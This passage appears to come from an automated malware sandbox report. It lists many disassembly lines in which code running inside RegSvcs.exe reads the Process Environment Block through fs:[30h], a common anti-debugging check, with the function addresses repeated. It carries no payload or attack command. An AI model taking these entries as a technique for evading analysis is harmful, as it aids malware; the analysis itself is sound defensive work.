                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A6E10E mov eax, dword ptr fs:[00000030h]14_2_01A6E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A6E10E mov ecx, dword ptr fs:[00000030h]14_2_01A6E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A6E10E mov eax, dword ptr fs:[00000030h]14_2_01A6E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A6E10E mov eax, dword ptr fs:[00000030h]14_2_01A6E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A6E10E mov ecx, dword ptr fs:[00000030h]14_2_01A6E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A6E10E mov eax, dword ptr fs:[00000030h]14_2_01A6E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A6E10E mov ecx, dword ptr fs:[00000030h]14_2_01A6E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019F0124 mov eax, dword ptr fs:[00000030h]14_2_019F0124
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A80115 mov eax, dword ptr fs:[00000030h]14_2_01A80115
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A6A118 mov ecx, dword ptr fs:[00000030h]14_2_01A6A118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A6A118 mov eax, dword ptr fs:[00000030h]14_2_01A6A118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A6A118 mov eax, dword ptr fs:[00000030h]14_2_01A6A118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A6A118 mov eax, dword ptr fs:[00000030h]14_2_01A6A118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019C6154 mov eax, dword ptr fs:[00000030h]14_2_019C6154
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019C6154 mov eax, dword ptr fs:[00000030h]14_2_019C6154
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019BC156 mov eax, dword ptr fs:[00000030h]14_2_019BC156
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A94164 mov eax, dword ptr fs:[00000030h]14_2_01A94164
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A94164 mov eax, dword ptr fs:[00000030h]14_2_01A94164
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A54144 mov eax, dword ptr fs:[00000030h]14_2_01A54144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A54144 mov eax, dword ptr fs:[00000030h]14_2_01A54144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A54144 mov ecx, dword ptr fs:[00000030h]14_2_01A54144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A54144 mov eax, dword ptr fs:[00000030h]14_2_01A54144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A54144 mov eax, dword ptr fs:[00000030h]14_2_01A54144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A58158 mov eax, dword ptr fs:[00000030h]14_2_01A58158
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A580A8 mov eax, dword ptr fs:[00000030h]14_2_01A580A8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A860B8 mov eax, dword ptr fs:[00000030h]14_2_01A860B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A860B8 mov ecx, dword ptr fs:[00000030h]14_2_01A860B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019C208A mov eax, dword ptr fs:[00000030h]14_2_019C208A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019B80A0 mov eax, dword ptr fs:[00000030h]14_2_019B80A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A460E0 mov eax, dword ptr fs:[00000030h]14_2_01A460E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A020F0 mov ecx, dword ptr fs:[00000030h]14_2_01A020F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019BC0F0 mov eax, dword ptr fs:[00000030h]14_2_019BC0F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019C80E9 mov eax, dword ptr fs:[00000030h]14_2_019C80E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019BA0E3 mov ecx, dword ptr fs:[00000030h]14_2_019BA0E3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A420DE mov eax, dword ptr fs:[00000030h]14_2_01A420DE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019DE016 mov eax, dword ptr fs:[00000030h]14_2_019DE016
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019DE016 mov eax, dword ptr fs:[00000030h]14_2_019DE016
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019DE016 mov eax, dword ptr fs:[00000030h]14_2_019DE016
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019DE016 mov eax, dword ptr fs:[00000030h]14_2_019DE016
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A56030 mov eax, dword ptr fs:[00000030h]14_2_01A56030
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A44000 mov ecx, dword ptr fs:[00000030h]14_2_01A44000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A62000 mov eax, dword ptr fs:[00000030h]14_2_01A62000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A62000 mov eax, dword ptr fs:[00000030h]14_2_01A62000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A62000 mov eax, dword ptr fs:[00000030h]14_2_01A62000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A62000 mov eax, dword ptr fs:[00000030h]14_2_01A62000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A62000 mov eax, dword ptr fs:[00000030h]14_2_01A62000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A62000 mov eax, dword ptr fs:[00000030h]14_2_01A62000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A62000 mov eax, dword ptr fs:[00000030h]14_2_01A62000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A62000 mov eax, dword ptr fs:[00000030h]14_2_01A62000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019BA020 mov eax, dword ptr fs:[00000030h]14_2_019BA020
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019BC020 mov eax, dword ptr fs:[00000030h]14_2_019BC020
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019C2050 mov eax, dword ptr fs:[00000030h]14_2_019C2050
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019EC073 mov eax, dword ptr fs:[00000030h]14_2_019EC073
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A46050 mov eax, dword ptr fs:[00000030h]14_2_01A46050
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019B8397 mov eax, dword ptr fs:[00000030h]14_2_019B8397
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019B8397 mov eax, dword ptr fs:[00000030h]14_2_019B8397
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019B8397 mov eax, dword ptr fs:[00000030h]14_2_019B8397
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019E438F mov eax, dword ptr fs:[00000030h]14_2_019E438F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019E438F mov eax, dword ptr fs:[00000030h]14_2_019E438F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019BE388 mov eax, dword ptr fs:[00000030h]14_2_019BE388
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019BE388 mov eax, dword ptr fs:[00000030h]14_2_019BE388
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019BE388 mov eax, dword ptr fs:[00000030h]14_2_019BE388
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019CA3C0 mov eax, dword ptr fs:[00000030h]14_2_019CA3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019CA3C0 mov eax, dword ptr fs:[00000030h]14_2_019CA3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019CA3C0 mov eax, dword ptr fs:[00000030h]14_2_019CA3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019CA3C0 mov eax, dword ptr fs:[00000030h]14_2_019CA3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019CA3C0 mov eax, dword ptr fs:[00000030h]14_2_019CA3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019CA3C0 mov eax, dword ptr fs:[00000030h]14_2_019CA3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019C83C0 mov eax, dword ptr fs:[00000030h]14_2_019C83C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019C83C0 mov eax, dword ptr fs:[00000030h]14_2_019C83C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019C83C0 mov eax, dword ptr fs:[00000030h]14_2_019C83C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019C83C0 mov eax, dword ptr fs:[00000030h]14_2_019C83C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019F63FF mov eax, dword ptr fs:[00000030h]14_2_019F63FF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A463C0 mov eax, dword ptr fs:[00000030h]14_2_01A463C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A7C3CD mov eax, dword ptr fs:[00000030h]14_2_01A7C3CD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019DE3F0 mov eax, dword ptr fs:[00000030h]14_2_019DE3F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019DE3F0 mov eax, dword ptr fs:[00000030h]14_2_019DE3F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019DE3F0 mov eax, dword ptr fs:[00000030h]14_2_019DE3F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A643D4 mov eax, dword ptr fs:[00000030h]14_2_01A643D4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A643D4 mov eax, dword ptr fs:[00000030h]14_2_01A643D4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019D03E9 mov eax, dword ptr fs:[00000030h]14_2_019D03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019D03E9 mov eax, dword ptr fs:[00000030h]14_2_019D03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019D03E9 mov eax, dword ptr fs:[00000030h]14_2_019D03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019D03E9 mov eax, dword ptr fs:[00000030h]14_2_019D03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019D03E9 mov eax, dword ptr fs:[00000030h]14_2_019D03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019D03E9 mov eax, dword ptr fs:[00000030h]14_2_019D03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019D03E9 mov eax, dword ptr fs:[00000030h]14_2_019D03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019D03E9 mov eax, dword ptr fs:[00000030h]14_2_019D03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A6E3DB mov eax, dword ptr fs:[00000030h]14_2_01A6E3DB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A6E3DB mov eax, dword ptr fs:[00000030h]14_2_01A6E3DB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A6E3DB mov ecx, dword ptr fs:[00000030h]14_2_01A6E3DB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A6E3DB mov eax, dword ptr fs:[00000030h]14_2_01A6E3DB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019BC310 mov ecx, dword ptr fs:[00000030h]14_2_019BC310
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A98324 mov eax, dword ptr fs:[00000030h]14_2_01A98324
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A98324 mov ecx, dword ptr fs:[00000030h]14_2_01A98324
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A98324 mov eax, dword ptr fs:[00000030h]14_2_01A98324
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A98324 mov eax, dword ptr fs:[00000030h]14_2_01A98324
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019E0310 mov ecx, dword ptr fs:[00000030h]14_2_019E0310
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019FA30B mov eax, dword ptr fs:[00000030h]14_2_019FA30B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019FA30B mov eax, dword ptr fs:[00000030h]14_2_019FA30B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019FA30B mov eax, dword ptr fs:[00000030h]14_2_019FA30B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A6437C mov eax, dword ptr fs:[00000030h]14_2_01A6437C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A9634F mov eax, dword ptr fs:[00000030h]14_2_01A9634F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A42349 mov eax, dword ptr fs:[00000030h]14_2_01A42349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A42349 mov eax, dword ptr fs:[00000030h]14_2_01A42349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A42349 mov eax, dword ptr fs:[00000030h]14_2_01A42349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A42349 mov eax, dword ptr fs:[00000030h]14_2_01A42349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A42349 mov eax, dword ptr fs:[00000030h]14_2_01A42349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A42349 mov eax, dword ptr fs:[00000030h]14_2_01A42349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A42349 mov eax, dword ptr fs:[00000030h]14_2_01A42349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A42349 mov eax, dword ptr fs:[00000030h]14_2_01A42349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A42349 mov eax, dword ptr fs:[00000030h]14_2_01A42349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A42349 mov eax, dword ptr fs:[00000030h]14_2_01A42349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A42349 mov eax, dword ptr fs:[00000030h]14_2_01A42349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A42349 mov eax, dword ptr fs:[00000030h]14_2_01A42349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A42349 mov eax, dword ptr fs:[00000030h]14_2_01A42349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A42349 mov eax, dword ptr fs:[00000030h]14_2_01A42349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A42349 mov eax, dword ptr fs:[00000030h]14_2_01A42349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A68350 mov ecx, dword ptr fs:[00000030h]14_2_01A68350
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A4035C mov eax, dword ptr fs:[00000030h]14_2_01A4035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A4035C mov eax, dword ptr fs:[00000030h]14_2_01A4035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A4035C mov eax, dword ptr fs:[00000030h]14_2_01A4035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A4035C mov ecx, dword ptr fs:[00000030h]14_2_01A4035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A4035C mov eax, dword ptr fs:[00000030h]14_2_01A4035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A4035C mov eax, dword ptr fs:[00000030h]14_2_01A4035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A8A352 mov eax, dword ptr fs:[00000030h]14_2_01A8A352
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A562A0 mov eax, dword ptr fs:[00000030h]14_2_01A562A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A562A0 mov ecx, dword ptr fs:[00000030h]14_2_01A562A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A562A0 mov eax, dword ptr fs:[00000030h]14_2_01A562A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A562A0 mov eax, dword ptr fs:[00000030h]14_2_01A562A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A562A0 mov eax, dword ptr fs:[00000030h]14_2_01A562A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A562A0 mov eax, dword ptr fs:[00000030h]14_2_01A562A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019FE284 mov eax, dword ptr fs:[00000030h]14_2_019FE284
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019FE284 mov eax, dword ptr fs:[00000030h]14_2_019FE284
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A40283 mov eax, dword ptr fs:[00000030h]14_2_01A40283
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A40283 mov eax, dword ptr fs:[00000030h]14_2_01A40283
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A40283 mov eax, dword ptr fs:[00000030h]14_2_01A40283
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019D02A0 mov eax, dword ptr fs:[00000030h]14_2_019D02A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019D02A0 mov eax, dword ptr fs:[00000030h]14_2_019D02A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019CA2C3 mov eax, dword ptr fs:[00000030h]14_2_019CA2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019CA2C3 mov eax, dword ptr fs:[00000030h]14_2_019CA2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019CA2C3 mov eax, dword ptr fs:[00000030h]14_2_019CA2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019CA2C3 mov eax, dword ptr fs:[00000030h]14_2_019CA2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019CA2C3 mov eax, dword ptr fs:[00000030h]14_2_019CA2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019D02E1 mov eax, dword ptr fs:[00000030h]14_2_019D02E1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019D02E1 mov eax, dword ptr fs:[00000030h]14_2_019D02E1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019D02E1 mov eax, dword ptr fs:[00000030h]14_2_019D02E1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A962D6 mov eax, dword ptr fs:[00000030h]14_2_01A962D6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019B823B mov eax, dword ptr fs:[00000030h]14_2_019B823B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019C6259 mov eax, dword ptr fs:[00000030h]14_2_019C6259
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019BA250 mov eax, dword ptr fs:[00000030h]14_2_019BA250
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A70274 mov eax, dword ptr fs:[00000030h]14_2_01A70274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A70274 mov eax, dword ptr fs:[00000030h]14_2_01A70274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A70274 mov eax, dword ptr fs:[00000030h]14_2_01A70274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A70274 mov eax, dword ptr fs:[00000030h]14_2_01A70274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A70274 mov eax, dword ptr fs:[00000030h]14_2_01A70274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A70274 mov eax, dword ptr fs:[00000030h]14_2_01A70274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A70274 mov eax, dword ptr fs:[00000030h]14_2_01A70274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A70274 mov eax, dword ptr fs:[00000030h]14_2_01A70274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A70274 mov eax, dword ptr fs:[00000030h]14_2_01A70274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A70274 mov eax, dword ptr fs:[00000030h]14_2_01A70274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A70274 mov eax, dword ptr fs:[00000030h]14_2_01A70274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A70274 mov eax, dword ptr fs:[00000030h]14_2_01A70274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A48243 mov eax, dword ptr fs:[00000030h]14_2_01A48243
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A48243 mov ecx, dword ptr fs:[00000030h]14_2_01A48243
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019B826B mov eax, dword ptr fs:[00000030h]14_2_019B826B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A9625D mov eax, dword ptr fs:[00000030h]14_2_01A9625D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A7A250 mov eax, dword ptr fs:[00000030h]14_2_01A7A250
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A7A250 mov eax, dword ptr fs:[00000030h]14_2_01A7A250
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019C4260 mov eax, dword ptr fs:[00000030h]14_2_019C4260
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019C4260 mov eax, dword ptr fs:[00000030h]14_2_019C4260
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019C4260 mov eax, dword ptr fs:[00000030h]14_2_019C4260
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019FE59C mov eax, dword ptr fs:[00000030h]14_2_019FE59C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A405A7 mov eax, dword ptr fs:[00000030h]14_2_01A405A7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A405A7 mov eax, dword ptr fs:[00000030h]14_2_01A405A7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A405A7 mov eax, dword ptr fs:[00000030h]14_2_01A405A7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019F4588 mov eax, dword ptr fs:[00000030h]14_2_019F4588
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019C2582 mov eax, dword ptr fs:[00000030h]14_2_019C2582
